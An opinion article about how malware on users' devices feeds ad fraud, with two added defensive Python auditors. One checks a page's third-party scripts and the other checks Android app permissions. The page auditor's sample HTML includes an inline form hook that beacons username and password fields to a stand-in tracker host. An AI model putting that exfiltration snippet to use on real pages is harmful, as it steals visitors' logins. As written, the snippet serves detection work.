Hackers Plant Malware for Fun and Big Profits
Why do hackers hack? Because it’s fun. Why do hackers plant malware on humans’ devices? Because it’s fun and wildly profitable. Now that programmatic ad tech has conveniently set up a highly scalable ecosystem for transferring money from brand marketers’ digital budgets directly into the offshore accounts of mildly skilled cybercriminals, why not take full advantage? After all, the bank vault door is swung wide open and brands deposit $350 billion year after year. Why not just help yourself to some of that bullion?
Hackers don’t need to build bots of their own; they need to compromise real humans’ smartphones, laptops, computers, and smart devices with malware so they can command and control them. With a botnet of compromised devices, hackers make easy money by delivering traffic to sites that pay them for traffic [1]; installing apps for marketers that pay per install (e.g. Uber suing mobile exchanges for fake installs); continuously playing hypercasual mobile games that monetize via ads; or clicking on search ads and attribution URLs to earn CPC revenue and take credit for affiliate sales, respectively.
How do hackers get malware onto devices? They use tried-and-true methods, like the following:
Passive Watering Hole Attacks
Hackers’ malicious code lies in wait for humans to voluntarily visit certain sites (think piracy and porn sites), and the victims are usually too embarrassed to report anything afterwards. Over the years, we’ve seen hundreds of thousands of sites built on WordPress, Joomla, and Squarespace [2], [3], [4] compromised to plant malware on unsuspecting visitors. This week we’ve even seen a fake "corona" map laced with malware. And that’s before mentioning malicious third-party JavaScript trackers that "exfil" users’ private info, like logins and passwords [5].
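As an added example (not from the article and not FouAnalytics tooling), the following Python script does the check a site owner would run against the rogue third-party trackers this section warns about: it inventories every script on a page, flags external scripts whose origin is not on an allowlist or that carry no Subresource Integrity hash, tests each origin against a Content-Security-Policy script-src, and applies a crude keyword heuristic to inline scripts that hook a form and beacon its fields away. The sample page, the tracker on a reserved .invalid host, the allowlist and the CSP are all constructed for the demo, and the CSP matcher is deliberately minimal: it handles 'self', *, exact origins, bare hosts and *.wildcards, not nonces, hashes or 'strict-dynamic'.

```python
"""Inventory the scripts a page loads and flag the ones a watering-hole
compromise or rogue tracker hides in. Example code added to this article;
the allowlist, CSP and sample page below are constructed for the demo."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

PAGE_ORIGIN = "https://www.example.com"                            # assumed first party
ALLOWED_ORIGINS = {PAGE_ORIGIN, "https://analytics.example.net"}   # assumed allowlist
CSP = "default-src 'self'; script-src 'self' https://analytics.example.net"

# Constructed sample page: a first-party script, a vetted analytics tag with SRI,
# an unvetted tracker on a reserved .invalid host, and an inline form hook that
# beacons the login form's fields to that tracker (the "exfil" pattern).
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://analytics.example.net/tag.js"
        integrity="sha384-PLACEHOLDERHASH"></script>
<script src="//cdn.trk-example.invalid/t.js"></script>
</head><body>
<form><input name="user"><input name="pass" type="password"></form>
<script>
document.forms[0].addEventListener("submit", function (e) {
  navigator.sendBeacon("https://cdn.trk-example.invalid/c", new FormData(e.target));
});
</script></body></html>"""


class ScriptCollector(HTMLParser):
    """Record every <script>: external src plus integrity attr, or inline body."""
    def __init__(self):
        super().__init__()
        self.scripts, self._inline = [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"src": a["src"], "integrity": a.get("integrity")})
        else:
            self._inline = []            # start capturing an inline body

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            self.scripts.append({"src": None, "inline": "".join(self._inline)})
            self._inline = None


def origin(url, page_origin):
    """Origin a script URL resolves to; relative paths are first-party."""
    p = urlsplit(url)
    if not p.netloc:
        return page_origin
    scheme = p.scheme or urlsplit(page_origin).scheme   # protocol-relative //host/
    return f"{scheme}://{p.netloc}"


def csp_allows(csp, script_origin, page_origin):
    """Minimal script-src check: 'self', '*', exact origin, bare host, *.wildcard.
    Deliberately incomplete: no nonces, hashes or 'strict-dynamic'."""
    directives = {}
    for d in csp.split(";"):
        parts = d.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    sources = directives.get("script-src", directives.get("default-src", []))
    host = urlsplit(script_origin).netloc
    for src in sources:
        s = src.lower()
        if s == "*" or (s == "'self'" and script_origin == page_origin):
            return True
        scheme, _, hostpart = s.rpartition("://")
        if scheme and not script_origin.startswith(scheme + "://"):
            continue                     # scheme given and it does not match
        if hostpart.startswith("*.") and host.endswith(hostpart[1:]):
            return True
        if hostpart == host:
            return True
    return False


def audit(html, page_origin=PAGE_ORIGIN, csp=CSP, allowed=ALLOWED_ORIGINS):
    """Return (kind, detail) findings for the page's scripts."""
    c = ScriptCollector()
    c.feed(html)
    findings = []
    for s in c.scripts:
        if s["src"] is None:
            body = s["inline"]
            # Crude signal only: a form reference next to a beacon/fetch call.
            if "forms" in body and ("sendBeacon" in body or "fetch(" in body):
                findings.append(("inline-form-exfil", body.strip().splitlines()[0]))
            continue
        o = origin(s["src"], page_origin)
        if o not in allowed:
            findings.append(("unlisted-origin", o))
        if o != page_origin and not s["integrity"]:
            findings.append(("no-sri", s["src"]))
        if not csp_allows(csp, o, page_origin):
            findings.append(("csp-blocks", o))
    return findings


if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_HTML):
        print(f"{kind:18} {detail}")
```

Run against the sample, the first-party and allowlisted analytics scripts produce no findings, while the .invalid tracker is reported three times (unlisted origin, no SRI, blocked by the CSP) and the inline form hook is flagged. The "csp-blocks" finding is the useful one in practice: it tells you a script that is already on the page would stop loading if you shipped that policy, which is exactly what you want for a tracker you never approved.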
Active Malvertising Campaigns
If the need for compromised devices is more urgent, hackers run proactive malvertising campaigns: simple display ads laced with malicious code are bought into ad slots on mainstream sites with large human audiences (think news sites). These typically appear as pop-up or redirect ads that hijack users and send them to scam tech-support or sweepstakes sites. When the user clicks, or even tries to close the pop-up, the malware is installed. Clean.io published a chart (below) showing surges in malvertising activity that coincide with weekends, public holidays, and periods when humans are working from home on personal devices that are not as well hardened as their work devices.
Continuous Monitoring Through Mobile Apps
In addition to the passive and active attacks above, hackers can compromise users and commit ad fraud continuously through mobile apps. Ever heard of the flashlight app that asked for permission to make and receive calls, send and receive SMS text messages, and turn the microphone and camera on and off? Those and thousands of other keyboard, anti-virus, selfie-camera, cleaner, and free VPN apps have been caught not only abusing permissions [6] but also continuously loading ads in the background. Mobile devices are the perfect host for such ad fraud malware because they are always on and always connected to the Internet, so the malware can load ads around the clock. Humans notice their phones running out of battery by mid-morning, or their monthly data allowance used up in the first week of the month.
With popular emoji keyboards (e.g. ones downloaded 2 billion times) under their control, hackers can continuously monitor everything the user types: logins and passwords, every site visited, and every message exchanged with every friend. This is valuable data they sell to adtech companies that want it for ad targeting.
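As an added example covering the two paragraphs above (not from the article and not FouAnalytics tooling), this Python script audits an AndroidManifest.xml the way a reviewer would before publishing or allowing an app: it compares the requested permissions against a profile of what an app of that kind plausibly needs, flags the dangerous-level ones that fall outside it (calls, SMS, microphone for a flashlight), flags the non-prompting permissions that let an app run and render ads when nobody is using it, spots a receiver that restarts the app after every reboot, and treats an input-method service that also has network access as the keylogging channel the emoji-keyboard case needs. The two manifests are constructed for the demo; the permission names, the BIND_INPUT_METHOD service declaration and the BOOT_COMPLETED action are real Android identifiers, but the category profiles and the "dangerous" subset listed here are my own selection, not a complete copy of Android's protection levels.

```python
"""Audit an AndroidManifest.xml for the over-permissioned utility app the
article describes. Example code added here; the manifests below are
constructed and the category profiles are an assumption to tune."""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"   # android: attribute namespace

# What an app of each kind plausibly needs (assumption; adjust for your review process).
PROFILES = {
    "flashlight": {"android.permission.CAMERA"},     # the torch sits behind the camera
    "keyboard":   {"android.permission.VIBRATE"},    # haptic feedback only
}
# Subset of Android's dangerous-level permissions relevant to the article.
DANGEROUS = {
    "android.permission.CALL_PHONE", "android.permission.READ_PHONE_STATE",
    "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
}
# Permissions that never show the runtime prompt the dangerous ones do, and that
# together let an app reach the network, survive reboots, keep the CPU awake and
# draw over other apps: the kit for loading ads in the background.
BACKGROUND = {
    "android.permission.INTERNET", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.WAKE_LOCK", "android.permission.SYSTEM_ALERT_WINDOW",
}

# Constructed manifest 1: the flashlight app from the article.
FLASHLIGHT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.brightlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <application>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest 2: an emoji keyboard whose IME service can reach the network.
KEYBOARD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.emojikeys">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.VIBRATE"/>
  <application>
    <service android:name=".EmojiIme" android:permission="android.permission.BIND_INPUT_METHOD">
      <intent-filter><action android:name="android.view.InputMethod"/></intent-filter>
    </service>
  </application>
</manifest>"""


def audit_manifest(xml_text, category):
    """Return the package name and a list of (kind, detail) findings."""
    root = ET.fromstring(xml_text)
    requested = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    findings = []
    for perm in sorted(requested - PROFILES[category]):
        if perm in DANGEROUS:
            findings.append(("dangerous-out-of-profile", perm))
        elif perm in BACKGROUND:
            findings.append(("background-signal", perm))
    # A receiver for BOOT_COMPLETED means the app starts itself after every reboot.
    for rcv in root.iter("receiver"):
        if any(a.get(ANDROID + "name") == "android.intent.action.BOOT_COMPLETED"
               for a in rcv.iter("action")):
            findings.append(("boot-persistence", rcv.get(ANDROID + "name")))
    # An input-method service sees every keystroke; with INTERNET it can send them off-device.
    is_ime = any(s.get(ANDROID + "permission") == "android.permission.BIND_INPUT_METHOD"
                 for s in root.iter("service"))
    if is_ime and "android.permission.INTERNET" in requested:
        findings.append(("ime-with-network", "android.permission.INTERNET"))
    return {"package": root.get("package"), "findings": findings}


if __name__ == "__main__":
    for manifest, category in ((FLASHLIGHT_MANIFEST, "flashlight"), (KEYBOARD_MANIFEST, "keyboard")):
        result = audit_manifest(manifest, category)
        print(result["package"])
        for kind, detail in result["findings"]:
            print(f"  {kind:24} {detail}")
```

The flashlight manifest yields five dangerous permissions outside its profile, four background signals and a boot-persistence receiver; the keyboard yields only two findings, but the "ime-with-network" one is the whole story, since a keyboard that needs no network has no reason to hold INTERNET. The check is static and says nothing about what the code actually does with the grants, so treat findings as a reason to look at the APK, not as proof of fraud.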
So it all ties, in a nice neat bow.
Hackers hack and make big money. Adtech companies can sell big traffic, inflated user "engagement" numbers, and data for ad targeting. Fraud detection firms can’t detect this fraud, so they mark everything as "valid." Marketers show their bosses spreadsheets with big numbers of ads and low CPM prices. And industry trade associations pat themselves on the back because they’re "winning" and they "solved fraud."
Shall we at least try to look more closely for fraud and make our digital marketing better? No? Ok. Keep calm and carry on. Don’t mind me.
FouAnalytics - "see Fou yourself" with better analytics
Slides version here: https://www.slideshare.net/augustinefou/ad-fraud-is-cash-out-for-hacking